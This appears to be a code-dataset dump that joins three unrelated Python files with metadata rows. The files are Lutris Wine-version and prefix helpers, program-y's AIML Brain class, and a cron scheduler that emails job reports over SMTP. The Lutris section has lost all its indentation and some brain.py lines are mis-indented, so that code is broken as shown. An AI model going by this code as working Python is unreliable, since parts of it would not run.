arch = detect_prefix_arch(prefix_path)
if arch:
return arch
if wine_path and system.path_exists(wine_path + "64"):
return "win64"
return "win32"
def detect_prefix_arch(prefix_path=None):
"""Return the architecture of the prefix found in `prefix_path`.
If no `prefix_path` given, return the arch of the system's default prefix.
If no prefix found, return None."""
if not prefix_path:
prefix_path = "~/.wine"
prefix_path = os.path.expanduser(prefix_path)
registry_path = os.path.join(prefix_path, "system.reg")
if not os.path.isdir(prefix_path) or not os.path.isfile(registry_path):
# No prefix_path exists or invalid prefix
logger.debug("Prefix not found: %s", prefix_path)
return None
with open(registry_path, "r") as registry:
for _line_no in range(5):
line = registry.readline()
if "win64" in line:
return "win64"
if "win32" in line:
return "win32"
logger.debug("Failed to detect Wine prefix architecture in %s", prefix_path)
return None
def set_drive_path(prefix, letter, path):
"""Changes the path to a Wine drive"""
dosdevices_path = os.path.join(prefix, "dosdevices")
if not system.path_exists(dosdevices_path):
raise OSError("Invalid prefix path %s" % prefix)
drive_path = os.path.join(dosdevices_path, letter + ":")
if system.path_exists(drive_path):
os.remove(drive_path)
logger.debug("Linking %s to %s", drive_path, path)
os.symlink(path, drive_path)
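# Added example (illustrative paths): map drive D: of the default prefix
# to a games mount point.
#
#   set_drive_path(os.path.expanduser('~/.wine'), 'd', '/mnt/games')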
def use_lutris_runtime(wine_path, force_disable=False):
"""Returns whether to use the Lutris runtime.
The runtime can be forced to be disabled, otherwise it's disabled
automatically if Wine is installed system wide.
"""
if force_disable or runtime.RUNTIME_DISABLED:
logger.info("Runtime is forced disabled")
return False
if WINE_DIR in wine_path:
logger.debug("%s is provided by Lutris, using runtime", wine_path)
return True
if is_installed_systemwide():
logger.info("Using system wine version, not using runtime")
return False
logger.debug("Using Lutris runtime for wine")
return True
def is_mingw_build(wine_path):
"""Returns whether a wine build is built with MingW"""
base_path = os.path.dirname(os.path.dirname(wine_path))
# A MingW build has an .exe file while a GCC one will have a .so
return system.path_exists(os.path.join(base_path, "lib/wine/iexplore.exe"))
def is_gstreamer_build(wine_path):
"""Returns whether a wine build ships with gstreamer libraries.
This allows to set GST_PLUGIN_SYSTEM_PATH_1_0 for the builds that support it.
"""
base_path = os.path.dirname(os.path.dirname(wine_path))
return system.path_exists(os.path.join(base_path, "lib64/gstreamer-1.0"))
def is_installed_systemwide():
"""Return whether Wine is installed outside of Lutris"""
for build in WINE_PATHS.values():
if system.find_executable(build):
# if wine64 is installed but not wine32, don't consider it
# a system-wide installation.
if (
build == "wine" and system.path_exists("/usr/lib/wine/wine64")
and not system.path_exists("/usr/lib/wine/wine")
):
logger.warning("wine32 is missing from system")
return False
return True
return False
def get_system_wine_versions():
"""Return the list of wine versions installed on the system"""
versions = []
for build in sorted(WINE_PATHS.keys()):
version = get_wine_version(WINE_PATHS[build])
if version:
versions.append(build)
return versions
def get_lutris_wine_versions():
"""Return the list of wine versions installed by lutris"""
versions = []
if system.path_exists(WINE_DIR):
dirs = version_sort(os.listdir(WINE_DIR), reverse=True)
for dirname in dirs:
if is_version_installed(dirname):
versions.append(dirname)
return versions
def get_proton_versions():
"""Return the list of Proton versions installed in Steam"""
versions = []
for proton_path in get_proton_paths():
proton_versions = [p for p in os.listdir(proton_path) if "Proton" in p]
for version in proton_versions:
path = os.path.join(proton_path, version, "dist/bin/wine")
if os.path.isfile(path):
versions.append(version)
return versions
def get_pol_wine_versions():
"""Return the list of wine versions installed by Play on Linux"""
if not POL_PATH:
return []
versions = []
for arch in ['x86', 'amd64']:
builds_path = os.path.join(POL_PATH, "wine/linux-%s" % arch)
if not system.path_exists(builds_path):
continue
for version in os.listdir(builds_path):
if system.path_exists(os.path.join(builds_path, version, "bin/wine")):
versions.append("PlayOnLinux %s-%s" % (version, arch))
return versions
@lru_cache(maxsize=8)
def get_wine_versions():
"""Return the list of Wine versions installed"""
versions = []
versions += get_system_wine_versions()
versions += get_lutris_wine_versions()
if os.environ.get("LUTRIS_ENABLE_PROTON"):
versions += get_proton_versions()
versions += get_pol_wine_versions()
return versions
def get_wine_version_exe(version):
if not version:
version = get_default_version()
if not version:
raise RuntimeError("Wine is not installed")
return os.path.join(WINE_DIR, "{}/bin/wine".format(version))
def is_version_installed(version):
return os.path.isfile(get_wine_version_exe(version))
def is_esync_limit_set():
"""Checks if the number of files open is acceptable for esync usage."""
if ESYNC_LIMIT_CHECK in ("0", "off"):
logger.info("fd limit check for esync was manually disabled")
return True
return linux.LINUX_SYSTEM.has_enough_file_descriptors()
def is_fsync_supported():
"""Checks if the running kernel has Valve's futex patch applied."""
if FSYNC_SUPPORT_CHECK in ("0", "off"):
logger.info("futex patch check for fsync was manually disabled")
return True
return fsync.is_fsync_supported()
def get_default_version():
"""Return the default version of wine. Prioritize 64bit builds"""
installed_versions = get_wine_versions()
wine64_versions = [version for version in installed_versions if "64" in version]
if wine64_versions:
return wine64_versions[0]
if installed_versions:
return installed_versions[0]
return
def get_wine_version(wine_path="wine"):
"""Return the version of Wine installed on the system."""
if wine_path != "wine" and not system.path_exists(wine_path):
return
if wine_path == "wine" and not system.find_executable("wine"):
return
if os.path.isabs(wine_path):
wine_stats = os.stat(wine_path)
if wine_stats.st_size < 2000:
# This version is a script, ignore it
return
version = system.read_process_output([wine_path, "--version"])
if not version:
logger.error("Error reading wine version for %s", wine_path)
return
if version.startswith("wine-"):
version = version[5:]
return version
def is_version_esync(path):
"""Determines if a Wine build is Esync capable
Params:
path: the path to the Wine version
Returns:
bool: True is the build is Esync capable
"""
try:
version = path.split("/")[-3].lower()
except IndexError:
logger.error("Invalid path '%s'", path)
return False
_version_number, version_prefix, version_suffix = parse_version(version)
esync_compatible_versions = ["esync", "lutris", "tkg", "ge", "proton", "staging"]
for esync_version in esync_compatible_versions:
if esync_version in version_prefix or esync_version in version_suffix:
return True
wine_version = get_wine_version(path).lower()
return "esync" in wine_version or "staging" in wine_version
def is_version_fsync(path):
"""Determines if a Wine build is Fsync capable
Params:
path: the path to the Wine version
Returns:
bool: True is the build is Fsync capable
"""
try:
version = path.split("/")[-3].lower()
except IndexError:
logger.error("Invalid path '%s'", path)
return False
_, version_prefix, version_suffix = parse_version(version)
fsync_compatible_versions = ["fsync", "lutris", "ge", "proton"]
for fsync_version in fsync_compatible_versions:
if fsync_version in version_prefix or fsync_version in version_suffix:
return True
return "fsync" in get_wine_version(path).lower()
def get_real_executable(windows_executable, working_dir=None):
"""Given a Windows executable, return the real program
capable of launching it along with necessary arguments."""
exec_name = windows_executable.lower()
if exec_name.endswith(".msi"):
return ("msiexec", ["/i", windows_executable], working_dir)
if exec_name.endswith(".bat"):
if not working_dir or os.path.dirname(windows_executable) == working_dir:
working_dir = os.path.dirname(windows_executable) or None
windows_executable = os.path.basename(windows_executable)
return ("cmd", ["/C", windows_executable], working_dir)
if exec_name.endswith(".lnk"):
return ("start", ["/unix", windows_executable], working_dir)
return (windows_executable, [], working_dir)
def display_vulkan_error(on_launch):
if on_launch:
checkbox_message = _("Launch anyway and do not show this message again.")
else:
checkbox_message = _("Enable anyway and do not show this message again.")
setting = "hide-no-vulkan-warning"
DontShowAgainDialog(
setting,
_("Vulkan is not installed or is not supported by your system"),
secondary_message=_(
"If you have compatible hardware, please follow "
"the installation procedures as described in\n"
"<a href='https://github.com/lutris/lutris/wiki/How-to:-DXVK'>"
"How-to:-DXVK (https://github.com/lutris/lutris/wiki/How-to:-DXVK)</a>"
),
checkbox_message=checkbox_message,
)
return settings.read_setting(setting) == "True"
def esync_display_limit_warning():
ErrorDialog(_(
"Your limits are not set correctly."
" Please increase them as described here:"
" <a href='https://github.com/lutris/lutris/wiki/How-to:-Esync'>"
"How-to:-Esync (https://github.com/lutris/lutris/wiki/How-to:-Esync)</a>"
))
def fsync_display_support_warning():
ErrorDialog(_(
"Your kernel is not patched for fsync."
" Please get a patched kernel to use fsync."
))
def esync_display_version_warning(on_launch=False):
setting = "hide-wine-non-esync-version-warning"
if on_launch:
checkbox_message = _("Launch anyway and do not show this message again.")
else:
checkbox_message = _("Enable anyway and do not show this message again.")
DontShowAgainDialog(
setting,
_("Incompatible Wine version detected"),
secondary_message=_(
"The Wine build you have selected "
"does not support Esync.\n"
"Please switch to an Esync-capable version."
),
checkbox_message=checkbox_message,
)
return settings.read_setting(setting) == "True"
def fsync_display_version_warning(on_launch=False):
setting = "hide-wine-non-fsync-version-warning"
if on_launch:
checkbox_message = _("Launch anyway and do not show this message again.")
else:
checkbox_message = _("Enable anyway and do not show this message again.")
DontShowAgainDialog(
setting,
_("Incompatible Wine version detected"),
secondary_message=_(
"The Wine build you have selected "
"does not support Fsync.\n"
"Please switch to an Fsync-capable version."
),
checkbox_message=checkbox_message,
)
return settings.read_setting(setting) == "True"
def get_overrides_env(overrides):
"""
Output a string of dll overrides usable with WINEDLLOVERRIDES
See: https://wiki.winehq.org/Wine_User%27s_Guide#WINEDLLOVERRIDES.3DDLL_Overrides
"""
if not overrides:
return ""
override_buckets = OrderedDict([("n,b", []), ("b,n", []), ("b", []), ("n", []), ("d", []), ("", [])])
for dll, value in overrides.items():
if not value:
value = ""
value = value.replace(" ", "")
value = value.replace("builtin", "b")
value = value.replace("native", "n")
value = value.replace("disabled", "")
try:
override_buckets[value].append(dll)
except KeyError:
logger.error("Invalid override value %s", value)
continue
override_strings = []
for value, dlls in override_buckets.items():
if not dlls:
continue
override_strings.append("{}={}".format(",".join(sorted(dlls)), value))
return ";".join(override_strings)
|
gpl-3.0
| 8,157,385,588,169,447,000 | 33.950339 | 105 | 0.639346 | false |
dkamotsky/program-y
|
src/programy/brain.py
|
1
|
12686
|
"""
Copyright (c) 2016 Keith Sterling
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import logging
import os.path
import xml.etree.ElementTree as ET
from programy.processors.processing import ProcessorLoader
from programy.config.brain import BrainConfiguration
from programy.mappings.denormal import DenormalCollection
from programy.mappings.gender import GenderCollection
from programy.mappings.maps import MapCollection
from programy.mappings.normal import NormalCollection
from programy.mappings.person import PersonCollection
from programy.mappings.predicates import PredicatesCollection
from programy.mappings.pronouns import PronounsCollection
from programy.mappings.properties import PropertiesCollection
from programy.mappings.sets import SetCollection
from programy.mappings.triples import TriplesCollection
from programy.parser.aiml_parser import AIMLParser
from programy.utils.services.service import ServiceFactory
from programy.utils.text.text import TextUtils
class Brain(object):
def __init__(self, configuration: BrainConfiguration):
self._configuration = configuration
self._aiml_parser = AIMLParser(stop_on_invalid=True)
self._denormal_collection = DenormalCollection()
self._normal_collection = NormalCollection()
self._gender_collection = GenderCollection()
self._person_collection = PersonCollection()
self._person2_collection = PersonCollection()
self._predicates_collection = PredicatesCollection()
self._pronouns_collection = PronounsCollection()
self._triples_collection = TriplesCollection()
self._sets_collection = SetCollection()
self._maps_collection = MapCollection()
self._properties_collection = PropertiesCollection()
self._preprocessors = ProcessorLoader()
self._postprocessors = ProcessorLoader()
self.load(self._configuration)
@property
def configuration(self):
return self._configuration
@property
def aiml_parser(self):
return self._aiml_parser
@property
def denormals(self):
return self._denormal_collection
@property
def normals(self):
return self._normal_collection
@property
def genders(self):
return self._gender_collection
@property
def persons(self):
return self._person_collection
@property
def person2s(self):
return self._person2_collection
@property
def predicates(self):
return self._predicates_collection
@property
    def pronouns(self):
return self._pronouns_collection
@property
def triples(self):
return self._triples_collection
@property
def sets(self):
return self._sets_collection
@property
def maps(self):
return self._maps_collection
@property
def properties(self):
return self._properties_collection
@property
def preprocessors(self):
return self._preprocessors
@property
def postprocessors(self):
return self._postprocessors
def load(self, brain_configuration: BrainConfiguration):
self._aiml_parser.load_aiml(brain_configuration)
self.load_collections(brain_configuration)
self.load_services(brain_configuration)
def _load_denormals(self, brain_configuration):
if brain_configuration.denormal is not None:
total = self._denormal_collection.load_from_filename(brain_configuration.denormal)
logging.info("Loaded a total of %d denormalisations", total)
else:
logging.warning("No configuration setting for denormal")
def _load_normals(self, brain_configuration):
if brain_configuration.normal is not None:
total = self._normal_collection.load_from_filename(brain_configuration.normal)
logging.info("Loaded a total of %d normalisations", total)
else:
logging.warning("No configuration setting for normal")
def _load_genders(self, brain_configuration):
if brain_configuration.gender is not None:
total = self._gender_collection.load_from_filename(brain_configuration.gender)
logging.info("Loaded a total of %d genderisations", total)
else:
logging.warning("No configuration setting for gender")
def _load_persons(self, brain_configuration):
if brain_configuration.person is not None:
total = self._person_collection.load_from_filename(brain_configuration.person)
logging.info("Loaded a total of %d persons", total)
else:
logging.warning("No configuration setting for person")
def _load_person2s(self, brain_configuration):
if brain_configuration.person2 is not None:
total = self._person2_collection.load_from_filename(brain_configuration.person2)
logging.info("Loaded a total of %d person2s", total)
else:
logging.warning("No configuration setting for person2")
def _load_predicates(self, brain_configuration):
if brain_configuration.predicates is not None:
total = self._predicates_collection.load_from_filename(brain_configuration.predicates)
logging.info("Loaded a total of %d predicates", total)
else:
logging.warning("No configuration setting for predicates")
def _load_pronouns(self, brain_configuration):
if brain_configuration.pronouns is not None:
total = self._pronouns_collection.load_from_filename(brain_configuration.pronouns)
logging.info("Loaded a total of %d pronouns", total)
else:
logging.warning("No configuration setting for pronouns")
def _load_properties(self, brain_configuration):
if brain_configuration.properties is not None:
total = self._properties_collection.load_from_filename(brain_configuration.properties)
logging.info("Loaded a total of %d properties", total)
else:
logging.warning("No configuration setting for properties")
def _load_triples(self, brain_configuration):
if brain_configuration.triples is not None:
            total = self._triples_collection.load_from_filename(brain_configuration.triples)
logging.info("Loaded a total of %d triples", total)
else:
logging.warning("No configuration setting for triples")
def _load_sets(self, brain_configuration):
if brain_configuration.set_files is not None:
total = self._sets_collection.load(brain_configuration.set_files)
logging.info("Loaded a total of %d sets files", total)
else:
logging.warning("No configuration setting for set files")
def _load_maps(self, brain_configuration):
if brain_configuration.map_files is not None:
total = self._maps_collection.load(brain_configuration.map_files)
logging.info("Loaded a total of %d maps files", total)
else:
logging.warning("No configuration setting for map files")
def _load_preprocessors(self, brain_configuration):
if brain_configuration.preprocessors is not None:
total = self._preprocessors.load(brain_configuration.preprocessors)
logging.info("Loaded a total of %d pre processors", total)
else:
logging.warning("No configuration setting for pre processors")
def _load_postprocessors(self, brain_configuration):
if brain_configuration.postprocessors is not None:
total = self._postprocessors.load(brain_configuration.postprocessors)
logging.info("Loaded a total of %d post processors", total)
else:
logging.warning("No configuration setting for post processors")
def load_collections(self, brain_configuration):
self._load_denormals(brain_configuration)
self._load_normals(brain_configuration)
self._load_genders(brain_configuration)
self._load_persons(brain_configuration)
self._load_person2s(brain_configuration)
self._load_predicates(brain_configuration)
self._load_pronouns(brain_configuration)
self._load_properties(brain_configuration)
self._load_triples(brain_configuration)
self._load_sets(brain_configuration)
self._load_maps(brain_configuration)
self._load_preprocessors(brain_configuration)
self._load_postprocessors(brain_configuration)
def load_services(self, brain_configuration):
ServiceFactory.preload_services(brain_configuration.services)
def pre_process_question(self, bot, clientid, question):
return self.preprocessors.process(bot, clientid, question)
def ask_question(self, bot, clientid, sentence) -> str:
conversation = bot.get_conversation(clientid)
topic_pattern = conversation.predicate("topic")
if topic_pattern is None:
logging.debug("No Topic pattern default to [*]")
topic_pattern = "*"
else:
logging.debug("Topic pattern = [%s]", topic_pattern)
try:
that_question = conversation.nth_question(2)
that_sentence = that_question.current_sentence()
# If the last response was valid, i.e. not None and not an empty string, then use
# it as the that_pattern; otherwise we default to '*'
if that_sentence.response is not None and that_sentence.response != '':
that_pattern = TextUtils.strip_all_punctuation(that_sentence.response)
logging.debug("That pattern = [%s]", that_pattern)
else:
logging.debug("That pattern, no response, default to [*]")
that_pattern = "*"
except Exception:
logging.debug("No That pattern default to [*]")
that_pattern = "*"
match_context = self._aiml_parser.match_sentence(bot, clientid,
sentence,
topic_pattern=topic_pattern,
that_pattern=that_pattern)
if match_context is not None:
template_node = match_context.template_node()
logging.debug("AIML Parser evaluating template [%s]", template_node.to_string())
#template_node.template.dump(tabs="", output_func=print)
response = template_node.template.resolve(bot, clientid)
return response
return None
def post_process_response(self, bot, clientid, response: str):
return self.postprocessors.process(bot, clientid, response)
def dump_tree(self):
self._aiml_parser.pattern_parser.root.dump(tabs="")
def write_learnf_to_file(self, bot, clientid, pattern, topic, that, template):
learnf_path = "%s/learnf%s" % (self._configuration.aiml_files.files, self._configuration.aiml_files.extension)
logging.debug("Writing learnf to %s", learnf_path)
if os.path.isfile(learnf_path) is False:
file = open(learnf_path, "w+")
file.write('<?xml version="1.0" encoding="UTF-8"?>\n')
file.write('<aiml>\n')
file.write('</aiml>\n')
file.close()
tree = ET.parse(learnf_path)
root = tree.getroot()
# Add our new element
child = ET.Element("category")
child.append(pattern)
child.append(topic)
child.append(that)
child.append(template.xml_tree(bot, clientid))
root.append(child)
tree.write(learnf_path, method="xml")
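# For reference, the learnf file produced above takes this overall shape
# (a sketch; the actual pattern/topic/that/template elements come from the
# caller):
#
#   <?xml version="1.0" encoding="UTF-8"?>
#   <aiml>
#     <category>
#       <pattern>...</pattern>
#       <topic>...</topic>
#       <that>...</that>
#       <template>...</template>
#     </category>
#   </aiml>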
|
mit
| -2,240,654,620,025,691,600 | 40.188312 | 126 | 0.67271 | false |
Inmersa/Utilities
|
crontab/inmersa/scheduler/__init__.py
|
1
|
25463
|
__author__="tite"
__date__ ="$Jul 18, 2014 7:48:18 AM$"
import os
import sys
import string
import datetime
import traceback
from types import *
import ConfigParser
import smtplib
import logging
import logging.config
import extractors
import formatters
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage
import email
class Schedule():
config = None
mainsection = 'General'
odate = datetime.datetime.today()
activeJobs = list()
logger = None
activeJob = None
def __init__(self,cfgfile):
# Constructor
docroot = '/root/crons'
self.config = ScheduleParams(self.mainsection)
if os.path.isfile(cfgfile):
self.config.read(cfgfile)
elif os.path.isfile(docroot + '/' + cfgfile):
self.config.read(docroot + '/' + cfgfile)
else:
raise Exception("No config file (",cfgfile,") found in "+docroot)
#sys.exit(0)
# Set the default variables
self.config.set('DEFAULT','fecha',str(self.odate.day)+'/'+str(self.odate.month)+'/'+str(self.odate.year))
self.config.set('DEFAULT','fechahora',str(self.odate.day)+'/'+str(self.odate.month)+'/'+str(self.odate.year)+' '+str(self.odate.hour)+':'+str(self.odate.minute))
#print "Buscando el condig: ",self.config.get(self.mainsection,'logging-config')
if not self.config.logger and self.config.get(self.mainsection,'logging-config'):
tmpfile = self.config.get(self.mainsection,'logging-config')
if not os.path.isfile(tmpfile): tmpfile = self.config.get(self.mainsection,'rootdir')+tmpfile
if os.path.isfile(tmpfile): logging.config.fileConfig(tmpfile)
else: print "ERROR: config log file not found"
self.logger = logging.getLogger(str(self.__class__))
else:
self.logger = logging.getLogger(str(self.__class__))
self.logger.debug("reusing the existing logger definition")
tmpfile = None  # no logging-config file was read on this code path
self.logger.debug("Scheduler constructor loaded. Using %(file)s for logging" % {'file': tmpfile})
def _setupLog(self):
if not self.logger:
self.logger = logging.getLogger(str(self.__class__))
def load(self):
# Metodo Start??
aRawList = self.config.sections()
self.logger.debug("Checking on the following jobs: %s " % (aRawList))
for i in range(len(aRawList)):
if len(aRawList[i]):
if aRawList[i] == self.mainsection: continue;
seccion = aRawList[i]
# Skip inactive jobs without even looking at them
if self.config.has_option(seccion,'activo'):
act = self.config.get(seccion,'activo')
if act in ('no','NO','nones','No','nO'): continue
self.logger.debug("%s : is active" % (seccion))
bHoraOK = False
if not self.config.has_option(seccion,'hora'): bHoraOK = True
else:
hora = self.config.get(seccion,'hora')
aTmp = hora.split(' ')
for h in aTmp:
if str(self.odate.hour) == h :
bHoraOK = True
break;
self.logger.debug("%s : hora?(%s)" % (seccion,bHoraOK))
if bHoraOK and self.config.has_option(seccion,'diasemana'):
bHoraOK = False
diahoy = self.odate.weekday()+1
tmpstr = self.config.get(seccion,'diasemana')
aTmp = tmpstr.split(' ')
if len(aTmp):
for d in aTmp:
if str(diahoy) == d:
bHoraOK = True
break;
self.logger.debug("%s check diasemana: sigue activo ?(%s)" % (seccion,bHoraOK))
if bHoraOK and self.config.has_option(seccion,'dia'):
bHoraOK = False
diahoy = self.odate.day
tmpstr = self.config.get(seccion,'dia')
aTmp = tmpstr.split(' ')
if len(aTmp):
for d in aTmp:
if str(diahoy) == d:
bHoraOK = True
break;
self.logger.debug("%s check dia: sigue activo ?(%s)" % (seccion,bHoraOK))
if bHoraOK and self.config.has_option(seccion,'mes'):
bHoraOK = False
diahoy = self.odate.month
tmpstr = self.config.get(seccion,'mes')
aTmp = tmpstr.split(' ')
if len(aTmp):
for d in aTmp:
if str(diahoy) == d:
bHoraOK = True
break;
self.logger.debug("%s check mes: sigue activo ?(%s)" % (seccion,bHoraOK))
if bHoraOK:
if self.config.has_option(seccion,'extractor'): self.activeJobs.append(seccion)
self.logger.debug("Loaded the following jobs: %s " % (self.activeJobs))
def loadJob(self,seccion):
self._setupLog()
self.logger.debug("%s: startup with dCfg %s " % (seccion,self.config.dCfg))
if not self.activeJob: self.config._loadMain()
self.logger.debug("%s: after loadMain with dCfg %s " % (seccion,self.config.dCfg))
self.config.initialize(seccion)
self.logger.debug("%s: after initialize with dCfg %s " % (seccion,self.config.dCfg))
self.activeJob = Job(self.config)
self.logger.debug("method end - seccion(%(sec)s) with this config: %(dic)s " % {'sec':seccion, 'dic':self.config.dCfg} )
def run(self):
# Validacion para un metodo de test
#ruben
if not len(self.activeJobs):
#print "Nothing to do at ",self.odate.hour
self.logger.info("Nothing to do. No active jobs for this execution")
return
# Sending the email
# run method: this is where the actual work happens
### TODO: With all these validations, raise errors, instead of assigning default values
if self.config.has_option('General','remite'):
varfrom = self.config.get('General','remite')
else: varfrom = 'IEmpresa-biomundo@biomundo'
if self.config.has_option('General','tema'):
subject = self.config.get('General','tema')
else: subject = 'Informe de las '+str(self.odate.hour)
if self.config.has_option('General','smtp-server'):
servidor_correo = self.config.get('General','smtp-server')
else: servidor_correo = 'mail.wol'
aEmailDef = list()
if self.config.has_option('General','email'):
tmp = self.config.get('General','email')
aTmp = tmp.split(' ')
for e in aTmp: aEmailDef.append(e)
dEmailList = {}
for i in range(len(self.activeJobs)):
seccion = self.activeJobs[i]
try:
self.loadJob(seccion)
oI = self.activeJob
self.logger.debug("retrieved job %s " % oI)
if not oI: continue
oI.run()
oTmpMsg = oI.getMimeResult()
# if not isinstance(oTmpMsg,(list)): self.logger.debug("%s: Before closing .. Here is our message!\n%s"%(self.config.seccion(),oTmpMsg.as_string()))
oI.close()
#TODO: Here, issue and log an error before continuing
if not oTmpMsg or (type(oTmpMsg) is not DictType and type(oTmpMsg) is not InstanceType) :
self.logger.debug("No message! ")
continue
# if not isinstance(oTmpMsg,(list)): self.logger.debug("%s: Here is our message!\n%s"%(self.config.seccion(),oTmpMsg.as_string()))
aEmails = list()
if self.config.has_option(seccion,'email'):
tmp = self.config.get(seccion,'email')
aTmp = tmp.split(' ')
for e in aTmp: aEmails.append(e)
else: aEmails = aEmailDef
self.logger.debug("%s: Standard recipients on this section: %s " % (self.config.seccion(),aEmails))
if type(oTmpMsg) is InstanceType:
if aEmails and len(aEmails):
for e in aEmails:
bAttach = True
if not dEmailList.has_key(e):
if False and isinstance(oTmpMsg,(MIMEMultipart)):
self.logger.debug("%s: turns out we already have a multipart"%(self.config.seccion()))
dEmailList[e] = oTmpMsg
bAttach = False
else:
self.logger.debug("%s: building a new Multipart for %s " % (self.config.seccion(),e))
dEmailList[e] = MIMEMultipart('mixed')
dEmailList[e].add_header('Subject',subject)
dEmailList[e].add_header('To',e)
# self.logger.debug("%s: Adding %s to destination %s . now having:\n%s" % (self.config.seccion(),oTmpMsg.__class__,e,dEmailList[e].as_string()))
if bAttach: dEmailList[e].attach( oTmpMsg )
else:
"""
Si existe la opcion email en la seccion, ademas de a los indicados por la SQL (si hay) se manda
email a estos.
"""
self.logger.debug("%s: the sepecific job is a multi-destination " % (self.config.seccion()))
for (e,oMsg) in oTmpMsg.items():
#self.logger.debug("List of parts ? To: %s " % (e))
self.logger.debug("%s: job destination %s over class %s " % (self.config.seccion(),e,oMsg.__class__))
if not dEmailList.has_key(e):
self.logger.debug("%s: building a new Multipart for %s " % (self.config.seccion(),e))
dEmailList[e] = MIMEMultipart()
dEmailList[e].add_header('Subject',subject)
dEmailList[e].add_header('To',e)
dEmailList[e].attach( oMsg )
# if self.config.has_option(seccion,'email'):
if aEmails and len(aEmails):
for ee in aEmails:
if ee == e: continue;
self.logger.debug("%s: Topping with additional destination %s " % (self.config.seccion(),ee))
if not dEmailList.has_key(ee):
self.logger.debug("%s: building a new Multipart for %s " % (self.config.seccion(),ee))
dEmailList[ee] = MIMEMultipart()
dEmailList[ee].add_header('Subject',subject)
dEmailList[ee].add_header('To',ee)
dEmailList[ee].attach( oMsg )
except Exception as err:
self.logger.exception("When loading job %s " % (seccion))
continue
self.logger.info("ALL Jobs ran. ready to transport the output")
#FIXME: Credentials to authenticate on the SMTP Server need to be on config file!
if self.config.has_option('General','smtp-user'):
user = self.config.get('General','smtp-user')
else: user = None
if self.config.has_option('General','smtp-password'):
pwd = self.config.get('General','smtp-password')
else: pwd = None
if self.config.has_option('General','smtp-port'):
port = self.config.get('General','smtp-port')
else: port = 587
if True:
for (e,oBody) in dEmailList.items():
try:
#print e, oBody
self.logger.debug("Preparing email for %s" % (e))
for part in oBody.walk():
try:
self.logger.debug("\t%s / %s boundary %s " % (part.get_content_maintype(),part.get_content_subtype(),part.get_boundary()))
self.logger.debug("\tContent Disposition : %s - Content ID: %s " % (part.get_all('Content-disposition'),part.get_all('Content-ID')))
self.logger.debug("\tsample: %s\n----- next -----" % (part.get_payload(decode=False)[:75]))
except:
self.logger.debug("----- next -----")
smtpserver = smtplib.SMTP(servidor_correo,port)
#smtpserver = smtplib.SMTP("mail.biomundo.eu",587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()
if user: smtpserver.login(user, pwd)
self.logger.debug("transfering data for %s" % (e))
smtpserver.sendmail(varfrom,e,oBody.as_string())
#smtp.sendmail(varfrom,e,oBody.as_string())
self.logger.debug('done!')
smtpserver.close()
except Exception, err:  # don't shadow the loop variable 'e' (the recipient address)
self.logger.exception("Error sending email")
continue
else:
for (e,oBody) in dEmailList.items():
self.logger.debug("this is a dry run email to %s with content:\n%s" % (e,oBody))
self.logger.debug("End of Schedule run")
class ScheduleParams(ConfigParser.ConfigParser):
mainsection = 'General'
__dCfgGroups = {}
__dCfgVars = {}
aRequiredFields = None
aRequiredPaths = None
dCfg = {}
aLocalGroups = None
bStatusOK = True
mainConfigOptions = None
logger = None
_aliases = { 'disposition': ['disposicion'] }
"""
def __init__ (self,oCfg,seccion) :
"""
def __init__(self,general=None):
" quizas forzar el nombre de file "
if general: self.mainsection = general
ConfigParser.ConfigParser.__init__(self)
#super(ScheduleParams, self).__init__()
try:
#print "Buscando el condig: ",self.config.get(self.mainsection,'logging-config')
if self.get(self.mainsection,'logging-config'):
tmpfile = self.get(self.mainsection,'logging-config')
if not os.path.isfile(tmpfile):
tmpfile = self.get(self.mainsection,'rootdir')+tmpfile
if os.path.isfile(tmpfile):
logging.config.fileConfig(tmpfile)
else:
print "ERROR: config log file not found"
self.logger = logging.getLogger(str(self.__class__))
self.logger.debug("Constructor loaded. Using %(file)s for logging" % {'file':tmpfile} )
except ConfigParser.NoSectionError,e:
# ok
print "ScheduleParams::__init__() - with no config to get a logger"
def _setupLog(self):
if not self.logger:
self.logger = logging.getLogger(str(self.__class__))
def _loadMain(self):
self._setupLog()
if not self.mainConfigOptions:
self.logger.debug("mainConfigOptions empty. Loading them")
self.mainConfigOptions = self.options(self.mainsection)
if not len(self.mainConfigOptions):
self.bStatusOK = False
return None
self.__dCfgGroups = {}
self.__dCfgVars = {}
self.logger.debug("we should not be entering here more than once per execution .... ")
for i in range(len(self.mainConfigOptions)):
self.logger.debug("Iterator4mainConfigOptions %s - %s"%(i,self.mainConfigOptions[i]))
if self.mainConfigOptions[i].find('_') != -1:
aTmp = self.mainConfigOptions[i].split('_')
if len(aTmp) > 1:
if not self.__dCfgGroups.has_key(aTmp[0]): self.__dCfgGroups[aTmp[0]] = {}
if self.has_option(self.seccion(),self.mainConfigOptions[i]):
self.__dCfgGroups[aTmp[0]][aTmp[1]] = self.get(self.seccion(),self.mainConfigOptions[i])
else:
self.__dCfgGroups[aTmp[0]][aTmp[1]] = self.get(self.mainsection,self.mainConfigOptions[i])
else:
# maybe this is the only part that should be executed over and over ??
if self.seccion() and self.has_option(self.seccion(),self.mainConfigOptions[i]):
self.__dCfgVars[self.mainConfigOptions[i]] = self.get(self.seccion(),self.mainConfigOptions[i])
else:
self.__dCfgVars[self.mainConfigOptions[i]] = self.get(self.mainsection,self.mainConfigOptions[i])
self.logger.debug("dCfgGroups is %s \ndCfgVars is %s"%(self.__dCfgGroups,self.__dCfgVars))
def initialize(self,seccion):
self._setupLog()
self.logger.debug("%s Initializing with dCfg %s " % (seccion,self.dCfg))
